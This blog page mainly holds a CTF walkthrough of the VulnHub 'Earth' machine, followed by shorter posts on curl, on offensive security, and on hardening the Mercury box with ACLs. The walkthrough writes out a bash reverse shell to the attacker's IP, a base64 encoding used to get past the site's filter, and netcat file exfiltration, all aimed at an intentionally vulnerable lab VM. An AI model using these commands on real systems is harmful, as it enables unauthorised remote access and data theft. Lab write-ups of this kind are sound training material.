Capture the Flag

VulnHub Walkthrough – The Planets: Earth

The Planet EarthPreviously, we took a look at an intentionally vulnerable VM from VulnHub called The Planets: Mercury. This time, I’m going to tackle another one in the same series by the same author called The Planets: Earth. You can download the file to play along from here. Setup will actually be almost the same as it was in the Mercury post, so if you need help getting started, check back there.

I skipped planetary order because Venus was labelled as a “Medium” box and Earth is considered on the harder side of easy, so I wanted to step this up slowly as we go. As it turns out, this box definitely poses some challenges of its own. That isn’t to say that I didn’t miss an easier path, but I went in the most straightforward way I could find. I also had a misstep or two, and I’ll point out where I went down a trail without taking you there myself.

After I got the box running and figured out its IP address like last time, I ran the following command to figure out what was going on. sudo nmap -p- -sC -sV -T4 192.168.56.104 I had to use sudo because running -sV with nmap requires it. -p- scans all ports, -sC runs default scripts, -sV checks for versions, -T4 makes it run with more threads to get done faster.

sudo nmap -p- -sC -sV -T4 192.168.56.104

Not shown: 65512 filtered tcp ports (no-response), 20 filtered tcp ports (admin-prohibited)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_http-title: Earth Secure Messaging
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local

From our results, we can see that 3 ports are open: 22, 80, and 443. Those are the ports for SSH, HTTP, and HTTPS respectively. Just like last time, we save port 22/SSH for later, as that is often mid-to-endgame stuff in capture the flag boxes if web servers are present. I note that there are some DNS names to consider: earth.local and terratest.earth.local. Because 2 sites are potentially being hosted on one box, we’ll need to add those names to our hosts file so that we can use them in the web browser to get the sites we want.

I type the command sudo nano /etc/hosts in my Kali Linux virtual machine and then add this line to the bottom. After that, I save and exit and from now on, I can just refer to the box by those easier names rather than the IP address.

192.168.56.104  earth.local     terratest.earth.local

When I go to http://earth.local, it brings up the “Earth Secure Messaging Service”.
The default earth.local site

When I enter a message of a with a key of a, I get the same result (00). When I enter a message of a with a key of b, I get a different result (03). I made a note of this and checked the source of the HTML page and didn’t find anything of value.
My resulting messages

Going to https://terratest.earth.local/ brings up “Test site, please ignore.” in plain text, and the source is the same, so that’s not helpful for gaining a foothold. I will note that if you go to the http:// version of the terratest site, it just shows you the earth.local messaging site.

When in doubt, enumerate! Let’s use gobuster to see what we can see! For our command, dir means directory mode –url tells gobuster what URL to enumerate -w is the wordlist to use, and -k tells it to not do the SSL validation check (necessary here because this box has a self-signed cert and the check fails).

gobuster dir --url https://earth.local -w /usr/share/wordlists/dirb/common.txt -k
/admin                (Status: 301) [Size: 0] [--> /admin/]
/cgi-bin/             (Status: 403) [Size: 199]

gobuster dir --url https://terratest.earth.local -w /usr/share/wordlists/dirb/common.txt -k
/.hta                 (Status: 403) [Size: 199]
/.htaccess            (Status: 403) [Size: 199]
/.htpasswd            (Status: 403) [Size: 199]
/cgi-bin/             (Status: 403) [Size: 199]
/index.html           (Status: 200) [Size: 26]
Progress: 2933 / 4615 (63.55%)[ERROR] Get "https://terratest.earth.local/nokia": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
/robots.txt           (Status: 200) [Size: 521]
Progress: 4614 / 4615 (99.98%)

So, the regular site has an /admin page and the test site has a robots.txt file and maybe a /nokia directory. However, the /nokia was just a hiccup from the tool as I got an immediate 404 when trying to go there. Let’s take a look at the robots.txt at https://terratest.earth.local/robots.txt

User-Agent: *
Disallow: /*.asp
Disallow: /*.aspx
Disallow: /*.bat
Disallow: /*.c
Disallow: /*.cfm
Disallow: /*.cgi
Disallow: /*.com
Disallow: /*.dll
Disallow: /*.exe
Disallow: /*.htm
Disallow: /*.html
Disallow: /*.inc
Disallow: /*.jhtml
Disallow: /*.jsa
Disallow: /*.json
Disallow: /*.jsp
Disallow: /*.log
Disallow: /*.mdb
Disallow: /*.nsf
Disallow: /*.php
Disallow: /*.phtml
Disallow: /*.pl
Disallow: /*.reg
Disallow: /*.sh
Disallow: /*.shtml
Disallow: /*.sql
Disallow: /*.txt
Disallow: /*.xml
Disallow: /testingnotes.*

I’m not sure why testingnotes’ extension got left off, maybe to delay us? I tried going to different extensions: .txt, .html, .htm, .xml, and even no extension, but only .txt returned anything. Here’s what we got

Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.

First note, this seems to also suggest a testdata.txt file might be available and https://terratest.earth.local/testdata.txt gives us this

According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

Okay, that was some fast and furious fact finding. Let’s take stock of what we know now or might know.

Potential Username: terra
Encryption Used: XOR

If you already know everything there is to know about XOR, you can skip ahead a bit. If not, I’m going to do a little explaining about what I’m about to do. When you use XOR, it doesn’t matter which is the message and which is the key, it is like multiplication or addition in that the answer will be the same. That is also true backwards. If you take the answer and XOR the Message, you get the Key. If you take the answer and XOR the Key, you get the Message. Let’s see this in action with CyberChef. Using CyberChef is outside of this blog post (maybe a future one!), but take a look at what happens when I use a as Message and b as Key and then use b as Message and a as Key. No matter what, it comes out to 03.
An XOR Proof of Concept for Encryption

Now, what happens when 03 is passed in and a is the key? We get b as the message. And when 03 is passed in as the result and b is the key? a shows as the message.
An XOR Proof of Concept for Decryption

It looks like we have one of the pieces (either the Key or the Message) testdata.txt file. We also have the resulting ciphertext from the earth.local site. If I plug it in just like the proof of concept, I should get the other piece.
XOR Missing Piece Found

We get the string earthclimatechangebad4humans repeated over and over again.

earthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimatechangebad4humansearthclimat

Because of the way it is repeated and cut off, that probably means earthclimatechangebad4humans was the key and “According to radiometric dating…” was the message. Let’s try again with the same ciphertext input but only earthclimatechangebad4humans as the key. When we do, we get back the text from testdata.txt perfectly.
Decrypting with only the 28 character passphrase

Note: I tried the other messages that were on the page when we first got there, but only the initial message decrypted with that key (or that message). So no further gold to mine there. The note mentioned that terra was a username for the admin portal and I had forgotten about it until now. If the key isn’t the password, we’ll have to try SQL Injection or credential stuffing. So when we go to https://earth.local/admin, we get a link to login. Clicking it reveals a form. Here is what that looks like.

The Admin Login Page

Fortunately, terra:earthclimatechangebad4humans were the login credentials we need and we are presented with the admin page, ripe for some good old command issuing. whoami comes back apache.
Admin Login Success

Let’s try to find the user flag, which for Sir Proton, seems to usually be named user_flag.txt. I asked the input to find that file, got a path, then used cat to output the file. Flag 1 Complete!

find / -name "user_flag.txt"
Command output: /var/earth_web/user_flag.txt
cat /var/earth_web/user_flag.txt
Command output: [user_flag_3353b67d6437f07ba7d34afd7d2fc27d] 

Can I find the root flag the same way?

find / -name "root_flag.txt"
Command output: 

Drat! Gonna have to work at this the hard way. Can I SSH into the box with these credentials? No, I cannot. Okay, that means we have to use this admin portal to do a reverse shell. Let me see what we have on the server, do we have bash?

which bash
Command output: /usr/bin/bash

Okay, bash is here and usable, so let’s do a bash-based reverse shell. If we go to RevShells.com, we can find all we need to do it. Just fill in what you want and you get the command to issue on your local machine and what command to execute on the target to call to you.
My RevShells for this box

I issued those commands and got this

nc -lvnp 4444 # On the Kali Box
bash -i >& /dev/tcp/192.168.56.103/4444 0>&1 # In the admin CLI text box

Site Response: Remote connections are forbidden. 

D’OH! They must have something that parses the text coming in looking for IPs or something. Let’s see if we hide the command with base64 if that gets it done:

echo "bash -i >& /dev/tcp/192.168.56.103/4444 0>&1" | base64 # On Kali Machine
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwMy80NDQ0IDA+JjEK # Result
nc -lvnp 4444 # On Kali Box
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjEwMy80NDQ0IDA+JjEK" | base64 -d | bash # In the admin CLI text box

#Back on Kali...
connect to [192.168.56.103] from (UNKNOWN) [192.168.56.104] 53594
bash: cannot set terminal process group (832): Inappropriate ioctl for device
bash: no job control in this shell
bash-5.1$ 

whoami
apache

Yahtzee! I tried sudo -l like we did in Mercury to find what we could execute as sudo, but I don’t know apache‘s password, so that doesn’t work. The next step of low hanging fruit is to check and see if the SUID bit is set on any files that let me execute them as if I were the owner. I asked my buddy ChatGPT how to do that and got this command

find / -perm /4000 -type f 2>/dev/null
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/at
/usr/bin/sudo
/usr/bin/reset_root
/usr/sbin/grub2-set-bootflag
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/mount.nfs
/usr/lib/polkit-1/polkit-agent-helper-1

Well, reset_root sounds promising. Let me call it

reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

Okay. What is it checking exactly? I can’t easily tell on this box where I’m a super low privileged user, so I need to get this to my own box. Python was available, so I copied the binary to /tmp and tried python3 -m http.server from /tmp and tried to connect. It didn’t work. I tried a bunch of ports and none of it worked. So, I asked ChatGPT again and explained what I needed and my robot friend suggested I used netcat on both ends. Here is what worked:

nc -lvp 9001 > reset_root # On Kali
listening on [any] 9001 ... # Kali Response

nc 192.168.56.103 9001 < /usr/bin/reset_root # In my reverse shell terminal

connect to [192.168.56.103] from earth.local [192.168.56.104] 54190 # Kali Terminal updated with this message

And I had a file locally. I did a sudo chmod +x ./reset_root so I could run it. I asked ChatGPT and it suggested using a few programs to see what was being checked, two of them were strace and ltrace. When I tried to use strace to see what it was doing...

strace ./reset_root     
execve("./reset_root", ["./reset_root"], 0x7ffd2af42c30 /* 55 vars */) = 0
brk(NULL)                               = 0x67b000
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff2fff5d000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
newfstatat(3, "", {st_mode=S_IFREG|0644, st_size=114611, ...}, AT_EMPTY_PATH) = 0
mmap(NULL, 114611, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7ff2fff41000
close(3)                                = 0
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0P~\2\0\0\0\0\0"..., 832) = 832
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
newfstatat(3, "", {st_mode=S_IFREG|0755, st_size=1933688, ...}, AT_EMPTY_PATH) = 0
pread64(3, "\6\0\0\0\4\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0@\0\0\0\0\0\0\0"..., 784, 64) = 784
mmap(NULL, 1985936, PROT_READ, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7ff2ffd5c000
mmap(0x7ff2ffd82000, 1404928, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x26000) = 0x7ff2ffd82000
mmap(0x7ff2ffed9000, 348160, PROT_READ, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x17d000) = 0x7ff2ffed9000
mmap(0x7ff2fff2e000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1d1000) = 0x7ff2fff2e000
mmap(0x7ff2fff34000, 52624, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7ff2fff34000
close(3)                                = 0
mmap(NULL, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7ff2ffd59000
arch_prctl(ARCH_SET_FS, 0x7ff2ffd59740) = 0
set_tid_address(0x7ff2ffd59a10)         = 3872
set_robust_list(0x7ff2ffd59a20, 24)     = 0
rseq(0x7ff2ffd5a060, 0x20, 0, 0x53053053) = 0
mprotect(0x7ff2fff2e000, 16384, PROT_READ) = 0
mprotect(0x403000, 4096, PROT_READ)     = 0
mprotect(0x7ff2fff8f000, 8192, PROT_READ) = 0
prlimit64(0, RLIMIT_STACK, NULL, {rlim_cur=8192*1024, rlim_max=RLIM64_INFINITY}) = 0
munmap(0x7ff2fff41000, 114611)          = 0
newfstatat(1, "", {st_mode=S_IFCHR|0600, st_rdev=makedev(0x88, 0), ...}, AT_EMPTY_PATH) = 0
getrandom("\xc4\xad\x58\x5b\x45\x55\x52\x3f", 8, GRND_NONBLOCK) = 8
brk(NULL)                               = 0x67b000
brk(0x69c000)                           = 0x69c000
write(1, "CHECKING IF RESET TRIGGERS PRESE"..., 38CHECKING IF RESET TRIGGERS PRESENT...
) = 38
access("/dev/shm/kHgTFI5G", F_OK)       = -1 ENOENT (No such file or directory)
access("/dev/shm/Zw7bV9U5", F_OK)       = -1 ENOENT (No such file or directory)
access("/tmp/kcM0Wewe", F_OK)           = -1 ENOENT (No such file or directory)
write(1, "RESET FAILED, ALL TRIGGERS ARE N"..., 44RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
) = 44
exit_group(0)                           = ?
+++ exited with 0 +++

Well, that's a lot. The answer is probably in there, but let's see if ltrace is more concise.

ltrace ./reset_root
puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
)              = 38
access("/dev/shm/kHgTFI5G", 0)                           = -1
access("/dev/shm/Zw7bV9U5", 0)                           = -1
access("/tmp/kcM0Wewe", 0)                               = -1
puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
)              = 44
+++ exited (status 0) +++

Well, that's easier to see. And I can see those 3 access() lines were at the end of the strace output also. I just didn't know what to look for. So, I *THINK* that reset_root is just looking for those files to exist to work. So back in my reverse shell, I issued these four commands to make the three files and then run reset_root again.

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe
reset_root
CHECKING IF RESET TRIGGERS PRESENT...
RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth

Okay. So, can I switch to root and get the flag? Yep!

su root # Earth as password when prompted
whoami
root
cd /root
ls
anaconda-ks.cfg
root_flag.txt
cat root_flag.txt

              _-o#&&*''''?d:>b\_
          _o/"`''  '',, dMF9MMMMMHo_
       .o&#'        `"MbHMMMMMMMMMMMHo.
     .o"" '         vodM*$&&HMMMMMMMMMM?.
    ,'              $M&ood,~'`(&##MMMMMMH\
   /               ,MMMMMMM#b?#bobMMMMHMMML
  &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
 ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
|               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
$H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
MMMMMb_                   |MMMMMMMMMMMP'     :
HMMMMMMMHo                 `MMMMMMMMMT       .
?MMMMMMMMP                  9MMMMMMMM}       -
-?MMMMMMM                  |MMMMMMMMM?,d-    '
 :|MMMMMM-                 `MMMMMMMT .M|.   :
  .9MMM[                    &MMMMM*' `'    .
   :9MMk                    `MMM#"        -
     &M}                     `          .-
      `&.                             .
        `~,   .                     ./
            . _                  .-
              '`--._,dd###pp=""'

Congratulations on completing Earth!
If you have any feedback please contact me at SirFlash@protonmail.com
[root_flag_b0da9554d29db2117b02aa8b66ec492e]

We have achieved Root and Captured the Flag

There we have it. As far as I can tell, SSH being open was a rabbit hole and so were the other messages. I'm not sure if there was a better way to tell what reset_root was checking for, but if you were able to follow along and learn something, that's great! If you have any tips about how you may have solved this box differently, let me know.

General Tips

Core Tools to Know: curl

'curl'-y pig's tailAs all bloggers eventually find out, two of the best reasons to write blog posts are either to document something for yourself for later or to force yourself to learn something well enough to explain it to others. That’s the impetus of this series that I plan on doing from time to time. I want to get more familiar with some of these core tools and also have a reference / resource available that is in “Pete Think” so I can quickly find what I need to use these tools if I forget.

The first tool I want to tackle is curl. In the world of command-line tools, curl shines as a flexible utility for transferring data over various network protocols. Whether you’re working on the development side, the network admin side, or the security side, learning how to use curl effectively can be incredibly beneficial. This blog post will guide you through the very basics of curl, cover some common use cases, and explain when curl might be a better choice than wget.

What is curl

curl (Client for URL) is a command-line tool for transferring data with URLs. It supports a wide range of protocols including HTTP, HTTPS, FTP, SCP, TELNET, LDAP, IMAP, SMB, and many more. curl is known for its flexibility and is widely used for interacting with APIs, downloading files, and testing network connections.

Installing curl

Before diving into curl commands, you need to ensure it is installed on your system. Lots of operating systems come with it. In fact, even Windows has shipped with curl in Windows 10 and 11.

For Linux:

sudo apt-get install curl  # Debian/Ubuntu
sudo yum install curl      # CentOS/RHEL

For macOS:

brew install curl

For Windows
You can download the installer from the official curl website if it isn’t already on your system. To check, just type curl –help at the command prompt and see if it understand the command. If you get something back like this, you’re all set.

C:\Users\peteonsoftware>curl --help
Usage: curl [options...] <url>
 -d, --data <data>           HTTP POST data
 -f, --fail                  Fail fast with no output on HTTP errors
 -h, --help <category>       Get help for commands
 -i, --include               Include response headers in output
 -o, --output <file>         Write to file instead of stdout
 -O, --remote-name           Write output to file named as remote file
 -s, --silent                Silent mode
 -T, --upload-file <file>    Transfer local FILE to destination
 -u, --user <user:password>  Server user and password
 -A, --user-agent <name>     Send User-Agent <name> to server
 -v, --verbose               Make the operation more talkative
 -V, --version               Show version number and quit

This is not the full help, this menu is stripped into categories.
Use "--help category" to get an overview of all categories.
For all options use the manual or "--help all".

The Most Simple Example

The simplest way to use curl is to fetch the contents of a URL. Here is a basic example that will will print the HTML content of the specified URL to the terminal:

c:\
λ curl https://hosthtml.live
<!doctype html>
<html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_M6heeSY2n3p1IRsqfcIljkNrgqYXDBDFSWeybupIpyihjfHMZhFu8kniDL51hLxUnYHjgmcv2EYUtXfRDcRWZQ==" lang="en" style="background: #2B2B2B;">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC">
    <link rel="preconnect" href="https://www.google.com" crossorigin>
</head>
<body>
<div id="target" style="opacity: 0"></div>
<script>window.park = "eyJ1dWlkIjoiZDFhODUxY2ItOTUyZi00NGUyLTg4ZWMtMmU3ZGNhZmE1OTk0IiwicGFnZV90aW1lIjoxNzIwNzMyMzQxLCJwYWdlX3VybCI6Imh0dHBzOi8vaG9zdGh0bWwubGl2ZS8iLCJwYWdlX21ldGhvZCI6IkdFVCIsInBhZ2VfcmVxdWVzdCI6e30sInBhZ2VfaGVhZGVycyI6e30sImhvc3QiOiJob3N0aHRtbC5saXZlIiwiaXAiOiI3Mi4xMDQuMTY5LjE1NCJ9Cg==";</script>
<script src="/bwjblpHBR.js"></script>
</body>
</html>

Some Useful Examples to Actually Do Stuff

Downloading Files

# To download a file and save it with a specific name:
curl -o curlypigtail.jpg https://peteonsoftware.com/images/202407/curlytail.jpg

# If you want to save the file with the same name as in the URL:
curl -O https://peteonsoftware.com/images/202407/curlytail.jpg

Sending HTTP Requests

# GET requests are used to retrieve data from a server. The basic example is already shown above. 
# To include headers in the output, use the -i option:
curl -i https://hosthtml.live

# POST requests are used to send data to a server. 
# This is particularly useful when interacting with APIs. 
curl -X POST -d "param1=value1&param2=value2" http://somereallygreat.net/api

# Many APIs now accept JSON.  This is how you'd send that
curl -X POST -H "Content-Type: application/json" -d '{"key1":"value1", "key2":"value2"}' http://somereallygreat.net/api

# Without explaining it, we included a header above (-H).  That added a Content-Type header.  
# To add an Auth header, you might do something like this
curl -H "Authorization: Bearer token" http://asitethatneedsbearertokens.com

Cookies

# To save cookies from a response
curl -c cookies.txt https://www.google.com

# To send cookies with a request
curl -b cookies.txt https://www.google.com

When to Use curl Over wget

While both curl and wget are used to transfer data over the internet, they have different strengths. Daniel Stenberg is the creator of curl (and also contributes to wget) and he’s published a more lengthy comparison here. I defer to the expert, but here are some of my big takeaways.

curl Advantages

  • Flexibility: curl supports a wider range of protocols (like SCP, SFTP) and provides more options for customizing requests.
  • Availability: curl comes preinstalled on macOS and Windows 10/11. wget doesn’t.
  • Pipelining: curl can be used to chain multiple requests together, making it powerful for scripting complex interactions.
  • Reuse: curl is a library (libcurl), while wget is just a command line tool.

wget Advantages

  • Recursive Downloads: wget can download entire websites recursively, making it ideal for mirroring sites.
  • Simplicity: For simple downloading tasks, wget might be more straightforward and easier to use.

curl is a versatile tool that – once mastered – can simplify many network-related tasks. From downloading files to interacting with APIs, curl provides the flexibility and functionality needed for a wide range of applications. While wget has its strengths, particularly for simple downloads and recursive website copying, curl shines in its versatility and extensive options for customizing requests.

InfoSec

Understanding Offensive Security

A robot arm holding a robotic sword over a laptop representing Offensive SecurityAt first blush, Offensive Security can seem like an oxymoron or a misnomer. Are we saying that the best defense is a good offense? Not really. When people say that in the traditional sense, they usually mean that by attacking, you don’t give your opponent a chance to attack you, therefore there is less for you to defend against. That’s not what we’re doing here. We are not out attacking the “bad guys” in an attempt to tie up their resources to keep them from attacking us. What we’re really talking about is attacking ourselves internally or through a third party vendor.

Offensive security refers to proactive measures taken to identify, assess, and mitigate vulnerabilities within a system before malicious hackers can exploit them. Unlike defensive security, which focuses on protection and prevention, offensive security involves simulating attacks to uncover weaknesses and bolster defenses. This approach is also known as ethical hacking or penetration testing.

The hacking is “ethical”, because the people performing the exercise have permission to do it and share all of their results with the target and don’t keep, use, or share any vulnerabilities or data they might uncover with the outside world. Penetration testing (pen testing) is a process that involves simulating cyberattacks to identify vulnerabilities in a system, network, or application. Ethical hackers use the same techniques as malicious actors to find and fix security flaws.

Taking this up a notch is something called Red Teaming. Red teaming is an advanced form of penetration testing where a group of security professionals, known as the red team, emulate real-world cyberattacks over an extended period. Their goal is to test the organization’s detection and response capabilities. These groups perform vulnerability assessments, which involves systematically examining systems for vulnerabilities, typically using automated tools. While less thorough than penetration testing, vulnerability assessments provide a broad overview of potential security issues. In addition, offensive security professionals will often use social engineering attacks to exploit human psychology rather than technical vulnerabilities. Offensive security professionals also often conduct phishing simulations and other tactics to test an organization’s security awareness.

So that explains a little of what these teams do, but let’s consider a little more of the why.

  • Proactive Defense: Offensive security allows organizations to identify and address vulnerabilities before they can be exploited by attackers. By staying one step ahead, companies can significantly reduce the risk of data breaches and other security incidents.
  • Improving Security Posture: Regular penetration testing and vulnerability assessments provide actionable insights that help organizations strengthen their security posture. This ongoing process ensures that defenses evolve in response to emerging threats.
  • Compliance and Regulatory Requirements: Many industries have strict compliance and regulatory standards that mandate regular security testing. Offensive security practices help organizations meet these requirements and avoid potential fines and penalties. I can tell you that in several audits and compliance engagements that I’ve had recently that they’ve wanted evidence that we regularly conduct offensive security operations against our company.
  • Incident Response Preparedness: Red teaming exercises and other offensive security activities help organizations test and refine their incident response plans. This ensures that in the event of a real attack, the organization is prepared to respond quickly and effectively.

Ethical Hackers (or White Hat Hackers) are the backbone of offensive security. We’re talking about individuals who have the skillset to “be the bad guys” (Black Hat Hackers), but instead earn a living helping others be prepared. The important thing, though, is that you don’t have to be born a hacker, spend time in the seedy underbelly of the internet, nor wear all black to go into this field. There is a lot of reputable training available and some respected certifications that you can get that can help your employment chances in the field (CEH and OSCP to name two).

If you’re interested, give it a shot. There is almost no barrier to entry. Sites like TryHackMe and HackTheBox have free tiers and there are tons of YouTube channels offering training and walkthroughs and advice. I plan on spending a fair amount of time in future posts talking about various security topics – often from the Offensive Security angle – and working through some of the problems available to us on places like TryHackMe, HackTheBox, and VulnHub so that I can also give back a little and add one more resource to the pile in gratitude to what has been given to me, so stay tuned for that.

InfoSec

Locking Down Mercury

A composite image of Mercury behind cartoon jail bars, both images from PixabayIn my last post, I did a walkthrough for the VulnHub box The Planets: Mercury. This box was conceived and implemented to be low hanging fruit for people who enjoy Capture the Flag (CTF) exercises. The advice for much of what we used to gain our initial foothold are pretty basic. The advice should be pretty familiar to anyone who takes security hygiene seriously and certainly anyone who is running a production web server. Additionally, Injection (SQL and otherwise) is on the OWASP Top 10 consistently. It should be one of the things that should be checked and remediated early, but often isn’t. Nevertheless, we weren’t splitting atoms to find it or to suggest how to fix it. Here are the basic “Don’ts” from the Mercury CTF:

  • Don’t leave default error pages in place
  • Don’t leave public “to do” lists
  • Don’t construct SQL Queries using blind concatenation
  • Don’t leave text files with passwords in plain text (or any encoding) on the server

But none of those are how we gained root on the box. We took advantage of a misconfiguration on the server that was intended to let the user read from a log file. The Mercury box wanted to allow the user to read records from the /var/log/syslog file. Normally, that file requires elevated permissions to read it. The Admins on this example box chose to create a script that reads the last 10 lines from the file and then gave the user permissions to run sudo on this script. Unfortunately, we were able to use symlinks to cause that script to allow us to ultimately open a root shell instead.

But what could the Admins have done differently? The best solution here is probably using Access Control Lists (acls). Linux file systems for a few generations have supported these by default. To work with them, we can just install a package and then configure the permissions.

Take a look at these simple commands that could have prevented this avenue of privesc on Mercury.

# Install the acl package
# In Debian-based systems
sudo apt-get install acl
# In RedHat-based systems
sudo yum install acl

# See if your file systems supports ACLs
grep acl /etc/mke2fs.conf

# If they do, you will see acl in the default mount options
default_mntopts = acl,user_xattr

# If not, you should be able to run this command to set it up
# This has not been tested by me, as every Linux box I could find already had the permissions
sudo mount -o remount,acl /

# Looking at the ACL on the file to start, we see that I (user) have read and write
# the adm group has read, and everyone else has no permissions.
getfacl /var/log/syslog

# Output
getfacl: Removing leading '/' from absolute path names
# file: var/log/syslog
# owner: syslog
# group: adm
user::rw-
group::r--
other::---

# Now I'm going to configure a user to have read permissions using
# setfacl which was added when we installed the acl package
sudo setfacl -m u:exampleuser:r /var/log/syslog

# Let's check again
getfacl /var/log/syslog

# Output
getfacl: Removing leading '/' from absolute path names
# file: var/log/syslog
# owner: syslog
# group: adm
user::rw-
user:exampleuser:r--
group::r--
mask::r--
other::---

# You notice that now we have another user row in the output, saying
# that example user has read permissions on the file

That’s it! It took me a total of less than two minutes and this avenue of escalation could have been prevented. This is a good example of how thinking like an attacker can help you be a better Administrator if you think about how every change you make to a system could be exploited and then think about a better way. When in doubt, look for guidance, don’t get “creative”.

Capture the Flag

VulnHub Walkthrough – The Planets: Mercury

An image of the planet Mercury, from PixabayIn this post, I want to take you through a walkthrough of how to hack your way into an intentionally vulnerable VM provided by VulnHub and created by user SirFlash. You can see more about this exercise and download your own copy of the .ova file to follow along here. I’ve found that the easiest way to run this VM is with VirtualBox, but you do have to do some specific setup/configuration for the machine to work like we want it to. Because we can’t get into the machine, we can’t really configure very much, so the VirtualBox settings are key.

In addition to VirtualBox, you need a machine to do the penetration test from. Kali Linux is very popular, though I have worked through several of these kinds of exercises with Linux Mint. Kali isn’t meant to be a “daily driver” OS and is just a version of Linux with a lot of tools preinstalled. You can install your favorite tools yourself on any distro that you’d like, or even use another preconfigured one (like Parrot, Black Arch, etc). Many tools are also available on Windows, especially if you have Windows Subsystem for Linux installed and configured. However, if you are ever working through tutorials, walkthroughs, books, videos, or forums, Linux is almost always assumed. There are a lot of resources to get started with Linux and it isn’t nearly as daunting as you’d think.

Just as a note, this machine is in a category called “Capture the Flag” (CTF). This is a fun style of game where you can practice certain skills, techniques, and problem solving abilities. It, however, isn’t necessarily indicative of “real world” penetration tests. My goal is to talk through my thought process as we walk through so you can see how I’m using some of the techniques I’ve learned to operate within the guidelines that CTFs often have. Feel free to just read this through as information, but it is also very fun and beneficial if you can follow along.

I’m starting from the assumption that you’ve already installed VirtualBox, downloaded the Mercury.ova file, and have a machine to attack from.

Getting Started

After you download the Mercury.ova file, open VirtualBox. Click the File menu, and then select Import Appliance
VirtualBox File Import Appliance

Next, you will be prompted to locate the file to import. Make sure your source is “Local File System” and then use the file selector to navigate to where you downloaded the .ova file.
VirtualBox File Import Step Two

Then, you’ll be shown a summary of settings. I was fine with what was here and I clicked Finish.
VirtualBox File Import Step Three

It will do its thing and when it is done, you will see the Mercury VM show up in your list of VMs on the left hand side.
